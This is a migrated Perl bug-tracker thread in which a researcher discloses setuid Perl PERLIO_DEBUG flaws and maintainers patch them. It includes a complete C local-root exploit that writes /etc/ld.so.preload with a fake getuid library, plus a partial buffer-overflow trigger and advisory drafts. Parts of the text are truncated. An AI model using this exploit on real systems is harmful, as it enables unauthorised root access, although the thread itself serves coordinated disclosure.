New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
setuid perl security issues #7777
Comments
From kf_lists@digitalmunition.comPERLIO_DEBUG ./perlio.c: If $ENV{'PERLIO_DEBUG'} is not set PerlIO_debug() is a no-op. else you can do the following either via sperl or vial sperl: sperl: setuid wrapper: These are all setuid programs that invoke perl scripts. /usr/share/mooix/mooix-pty-helper.pl kfinisterre@jdam:/tmp$ umask 001 kfinisterre@jdam:/tmp$ tail /tmp/oops2 -n 3 kfinisterre@jdam:/tmp$ echo + + > /tmp/oops2 hrmmm... gonna try to write an ld.so.preload exploit without trashing my box. hehe. fun time. |
From kf_lists@digitalmunition.comWhile looking at the source code to figure out what the details of my PERLIO_DEBUG file overwrite bug in perlio.c: if (dbg > 0) { Set PERLIO_DEBUG to anything make a perl script calling sperl and run it with the full path (after placing it in a long ass directory) #!/usr/bin/sperl5.8.4 kfinisterre@jdam:/tmp$ /tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/test.pl stat64("/usr/local/share/perl/5.8.0", 0xbfffd880) = -1 ENOENT (No such file or directory) |
From @rgsKF (Lists) wrote:
I fixed the local root exploit by disabling PERLIO_DEBUG in sperl -- |
The RT System itself - Status changed from 'new' to 'open' |
From @rgsRafael Garcia-Suarez wrote:
hold on, it's not properly fixed now. |
From @rgsRafael Garcia-Suarez wrote:
It's now : Document the changes to PERLIO_DEBUG. Change 23906 on 2005/01/31 by rgs@grubert Really fix the bug [perl #33990]. |
@rgs - Status changed from 'open' to 'resolved' |
From kf_lists@digitalmunition.comMuch thanks on the quick response and fix. Do you have any idea what the span of this bug is (like what versions And finally, was this actually the buggy line of code for the overflow in perlio.c: if (dbg > 0) { Thanks for your time. -KF
|
From kf_lists@digitalmunition.com/*
* Copyright Kevin Finisterre
*
* ** DISCLAIMER ** I am in no way responsible for your stupidity.
* ** DISCLAIMER ** I am in no way liable for any damages caused by compilation and or execution of this code.
*
* ** WARNING ** DO NOT RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***
* ** WARNING ** overwriting /etc/ld.so.preload can severly fuck up your box (or someone elses).
* ** WARNING ** have a boot disk ready incase some thing goes wrong.
*
* Setuid Perl exploit by KF - kf_lists[at]secnetops[dot]com - 1/30/05
*
* this exploits a vulnerability in the PERLIO_DEBUG functionality
* tested against sperl5.8.4 on Debian
*
* kfinisterre@jdam:~$ cc -o ex_perl ex_perl.c
* kfinisterre@jdam:~$ ls -al /etc/ld.so.preload
* ls: /etc/ld.so.preload: No such file or directory
* kfinisterre@jdam:~$ ./ex_perl
* sperl needs fd script
* You should not call sperl directly; do you need to change a #! line
* from sperl to perl?
* kfinisterre@jdam:~$ su -
* jdam:~# id
* uid=0(root) gid=0(root) groups=0(root)
* jdam:~# rm /etc/ld.so.preload
*
*/
#define PRELOAD "/etc/ld.so.preload"
#include <stdio.h>
#include <strings.h>
int main(int *argc, char **argv)
{
FILE *getuid;
if(!(getuid = fopen("/tmp/getuid.c","w+"))) {
printf("error opening file\n");
exit(1);
}
fprintf(getuid, "int getuid(){return 0;}\n" );
fclose(getuid);
system("cc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc");
putenv("PERLIO_DEBUG="PRELOAD);
umask(001); // I'm rw-rw-rw james bitch!
system("/usr/bin/sperl5.8.4");
FILE *ld_so_preload;
char preload[] = {
"/tmp/getuid.so\n"
};
if(!(ld_so_preload = fopen(PRELOAD,"w+"))) {
printf("error opening file\n");
exit(1);
}
fwrite(preload,sizeof(preload)-1,1,ld_so_preload);
fclose(ld_so_preload);
}
|
From kf_lists@digitalmunition.com/*
* Copyright Kevin Finisterre
*
* Setuid perl PerlIO_Debug() overflow
*
* cc -o ex_perl2 ex_perl2.c -std=c99
*
* Not complete yet...
*/
#include <stdlib.h>
#include <stdio.h>
#include <strings.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
int main(int *argc, char **argv)
{
int count = 5;
char malpath[10000];
char tmp[256];
char *filler;
chdir("/tmp/");
filler = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/";
for (int x=0; x<3; x=x+1)
{
mkdir(filler, 0777);
chdir(filler);
count = count + 256;
}
memset(tmp,0x42,201);
count = count + 201;
strcat(tmp, "/");
mkdir(tmp, 0777);
chdir(tmp);
printf ("Dirlen: %d\n", count);
FILE *perlsploit;
char perldummyfile[] = {
"#!/usr/bin/sperl5.8.4\n"
"# \n"
"# Be proud that perl(1) may proclaim: \n"
"# Setuid Perl scripts are safer than C programs ...\n"
"# Do not abandon (deprecate) suidperl. Do not advocate C wrappers. \n"
};
if(!(perlsploit = fopen("take_me.pl","w+"))) {
printf("error opening file\n");
exit(1);
}
fwrite(perldummyfile,sizeof(perldummyfile)-1,1,perlsploit);
fclose(perlsploit);
getcwd(malpath, 10000);
strcat(malpath, "/");
strcat(malpath, "take_me.pl");
printf("running: %s\n",malpath);
chmod(malpath,0755);
putenv("PERLIO_DEBUG=/tmp/ninjitsu");
system(malpath);
} |
From @rgsKF (lists) wrote:
I'd say every release since we have PerlIO, e.g. every 5.8.x for x in
That's to be appreciated by the maint pumpking. Vendors are of course encouraged to grab those patches. A new package of perl for mandrakelinux is already on its way to the
Yes. Actually only threaded perls were affected. |
From @nwc10On Mon, Jan 31, 2005 at 04:42:59PM +0100, Rafael Garcia-Suarez wrote:
Who was already planning to start the 5.8.7 release process at the end of
This seems to be the best way. We probably should wrap up all 3 patches into
Nicholas Clark |
From @rgsNicholas Clark wrote:
Here's the single patch corresponding to my various commits in bleadperl : http://cvs.mandrakesoft.com/cgi-bin/cvsweb.cgi/ -- |
From kf_lists@digitalmunition.comRafael Garcia-Suarez via RT wrote:
Great... do you folks have a problem with me releaseing an advisory at |
From kf_lists@digitalmunition.com
There are currently NO posts on bugtraq for this issue. I notified I had planned to do a bugtraq / full-disclosure release pretty much In the past I have done simultaneous posts to bugtraq *with* a vendor. I -KF |
From kf_lists@digitalmunition.comGreat... let me know when you figure out how you want to procede with Thanks much.
|
From kf_lists@digitalmunition.comI am going to try to verify the patch fixes later tonight... I will let
-KF |
From kf_lists@digitalmunition.comDMA[2005-0131a] - 'Setuid Perl PERLIO_DEBUG root owned file creation' Description: In the July 18, 2002 one of the highlights for Perl 5.8.0 was a 'New IO Implementation' called As an attacker I would definately say that PerlIO has some rich behavior. Two vulnerabilities Perl provides debug access to PerlIO via an environment variable known as PERLIO_DEBUG. The perl kfinisterre@jdam:~$ ls -al /usr/bin/sperl5.8.4 At this point the game is pretty much over. Since the file is world writable the attacker can add kfinisterre@jdam:~$ cc -o ex_perl ex_perl.c The following patch for this bug was provided by Mandrake care of the vendor-sec list. This patch Index: perlio.c--- perlio.c (revision 4342) This is timeline associated with this bug. 01/30/2005 09:29 AM - Mail to larry wall, perlbug, vendor-sec et all -KF |
From kf_lists@digitalmunition.comDMA[2005-0131b] - 'Setuid Perl PERLIO_DEBUG buffer overflow' Description: In the July 18, 2002 one of the highlights for Perl 5.8.0 was a 'New IO Implementation' called As an attacker I would definately say that PerlIO has some rich behavior. Two vulnerabilities Perl provides debug access to PerlIO via an environment variable known as PERLIO_DEBUG. The perl kfinisterre@kfinisterre01:/tmp$ cat > test.pl The function responsible for logging the PerlIO data contains an unbounded call to sprintf() in perlio.c: if (dbg > 0) { We can trigger this vulnerability by placing a perl script in a very long directory tree and kfinisterre@kfinisterre01:~$ cc -o ex_perl2 ex_perl2.c -std=c99 It appears as if this vulnerability could be exploited to gain root privileges on the machine in The following patch for this bug was provided by Mandrake care of the vendor-sec list. This patch Index: perlio.c--- perlio.c (revision 4342) This is timeline associated with this bug. 01/30/2005 09:29 AM - Mail to larry wall, perlbug, vendor-sec et all -KF |
Migrated from rt.perl.org#33990 (status was 'resolved')
Searchable as RT33990$
The text was updated successfully, but these errors were encountered: